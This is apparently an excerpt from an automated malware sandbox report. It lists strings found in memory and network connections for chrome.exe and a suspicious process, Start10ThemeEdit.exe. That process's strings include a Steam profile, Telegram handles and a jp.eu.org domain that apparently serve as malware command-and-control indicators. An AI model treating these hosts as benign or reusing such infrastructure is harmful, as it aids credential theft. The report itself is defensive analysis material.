Source: chrome.exe, 00000008.00000002.2606465159.000031B802C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2605981979.000031B802B57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000008.00000003.2521643067.000031B80335C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2521765794.000031B80340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2521504816.000031B8025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2601946438.000031B802510000.00000004.00000800.00020000.00000000.sdmp, chromecache_514.10.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000008.00000002.2600464297.000031B802310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2605981979.000031B802B57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000008.00000002.2600282439.000031B8022C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000008.00000002.2599974426.000031B802270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000008.00000002.2602758289.000031B8026CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603835221.000031B802890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604580303.000031B80294C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000008.00000002.2602758289.000031B8026CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603835221.000031B802890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604687446.000031B802964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604580303.000031B80294C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000008.00000002.2602377397.000031B80260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: Start10ThemeEdit.exe, 00000006.00000003.3139258337.0000000002B91000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.3139194671.0000000002A2D000.00000004.00001000.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.3139766506.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199828130190
Source: Start10ThemeEdit.exe, 00000006.00000003.3139766506.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199828130190ot0yikamMozilla/5.0
Source: Start10ThemeEdit.exe, 00000006.00000002.3148124644.00000000047EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Start10ThemeEdit.exe, 00000006.00000002.3148124644.00000000047EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000C91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/G
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000C91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/H
Source: Start10ThemeEdit.exe, 00000006.00000003.2409625021.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g02f04
Source: Start10ThemeEdit.exe, 00000006.00000003.3139766506.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g02f04ot0yikamMozilla/5.0
Source: chrome.exe, 00000008.00000002.2606299171.000031B802BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: Start10ThemeEdit.exe, 00000006.00000003.2409625021.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: Start10ThemeEdit.exe, 00000006.00000003.2438214174.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org
Source: Start10ThemeEdit.exe, 00000006.00000003.2438214174.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/
Source: Start10ThemeEdit.exe, 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2451742401.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2451630556.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2465580145.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2423866627.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2438214174.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/3
Source: Start10ThemeEdit.exe, 00000006.00000003.2451742401.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2451630556.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/3JhZG
Source: Start10ThemeEdit.exe, 00000006.00000003.2451742401.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2451630556.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/8
Source: Start10ThemeEdit.exe, 00000006.00000003.2451742401.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2451630556.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/C
Source: Start10ThemeEdit.exe, 00000006.00000003.2423866627.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/Tc#&
Source: Start10ThemeEdit.exe, 00000006.00000003.2465580145.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2438214174.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/U
Source: Start10ThemeEdit.exe, 00000006.00000003.2451742401.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2451630556.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/k
Source: Start10ThemeEdit.exe, 00000006.00000003.2451742401.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2451630556.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2465580145.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/ntent
Source: Start10ThemeEdit.exe, 00000006.00000003.2451742401.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2451630556.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2465580145.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2423866627.0000000000CF2000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2438214174.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.orgQ
Source: Start10ThemeEdit.exe, 00000006.00000003.2466208915.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2451630556.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000003.2438214174.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.orgTc#&
Source: Start10ThemeEdit.exe, 00000006.00000002.3146557319.000000000454C000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003D00000.00000004.00000020.00020000.00000000.sdmp, ycjwbi.6.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Start10ThemeEdit.exe, 00000006.00000002.3146557319.000000000454C000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003D00000.00000004.00000020.00020000.00000000.sdmp, ycjwbi.6.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: is-VDE8M.tmp.3.dr, is-TP3J2.tmp.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003DEA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607169345.000031B802DC4000.00000004.00000800.00020000.00000000.sdmp, 89zcba.6.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000008.00000003.2518611328.000031B802EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2517479463.000031B802E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2606299171.000031B802BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000008.00000002.2607169345.000031B802DC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000008.00000002.2604812274.000031B802988000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/CharPk3
Source: chrome.exe, 00000008.00000002.2610330093.000031B803250000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000008.00000002.2600222778.000031B8022BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2610802097.000031B8034B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000008.00000002.2610802097.000031B8034B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos1
Source: content_new.js.14.dr	String found in binary or memory: https://www.google.com/chrome
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000008.00000002.2604957009.000031B8029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2605930040.000031B802B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000008.00000002.2604957009.000031B8029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2605930040.000031B802B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: Start10ThemeEdit.exe, 00000006.00000002.3143046149.0000000003DEA000.00000004.00000020.00020000.00000000.sdmp, Start10ThemeEdit.exe, 00000006.00000002.3144205572.000000000433A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2602925223.000031B802700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2604812274.000031B802988000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603313878.000031B80278C000.00000004.00000800.00020000.00000000.sdmp, 89zcba.6.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000008.00000002.2602377397.000031B80260C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000008.00000003.2521504816.000031B8025B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000008.00000002.2602758289.000031B8026CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000008.00000002.2602758289.000031B8026CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit1
Source: chrome.exe, 00000008.00000002.2606299171.000031B802BC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000008.00000002.2599925287.000031B80223C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000008.00000003.2542622315.000031B803A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000008.00000002.2601478596.000031B80240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000008.00000002.2601478596.000031B80240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000008.00000002.2601478596.000031B80240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000008.00000002.2601478596.000031B80240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000008.00000002.2602758289.000031B8026CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000008.00000003.2538694286.000031B8035C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000008.00000003.2539636104.000031B803148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2537225198.000031B803584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2611188020.000031B8035D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2539791436.000031B803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2539742598.000031B8035A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2538694286.000031B8035C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.MBb5Bwk2tpw.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000008.00000003.2539684595.000031B803584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.S4XVq7ljTQU.L.W.O/m=qmd
Source: Start10ThemeEdit.exe, 00000006.00000002.3148124644.00000000047EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Start10ThemeEdit.exe, 00000006.00000002.3148124644.00000000047EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Start10ThemeEdit.exe, 00000006.00000002.3148124644.00000000047EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Start10ThemeEdit.exe, 00000006.00000002.3148124644.00000000047EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Start10ThemeEdit.exe, 00000006.00000002.3148124644.00000000047EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Start10ThemeEdit.exe, 00000006.00000002.3148124644.00000000047EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: is-TP3J2.tmp.3.dr	String found in binary or memory: https://www.virtualbox.org/
Source: chrome.exe, 00000008.00000002.2612096433.000031B803DE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000008.00000002.2612096433.000031B803DE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/)
Source: chrome.exe, 00000008.00000003.2516721559.000031B802DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000008.00000003.2516721559.000031B802DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2608426686.000031B802F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2612279319.000031B803E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2555316743.000031B803E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000008.00000002.2612279319.000031B803E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2555316743.000031B803E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaogl
Source: chrome.exe, 00000008.00000003.2516721559.000031B802DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607803539.000031B802ED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000008.00000003.2521468790.000031B802DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2536260760.000031B802DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516721559.000031B802DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2608426686.000031B802F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2539831029.000031B802DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2517847205.000031B802DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2600426360.000031B802300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607169345.000031B802DC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2602925223.000031B802700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2612052483.000031B803D88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603313878.000031B80278C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000008.00000002.2602925223.000031B802700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html(
Source: chrome.exe, 00000008.00000002.2603313878.000031B80278C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlfjf
Source: chrome.exe, 00000008.00000002.2612052483.000031B803D88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50148 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 50159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 50078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
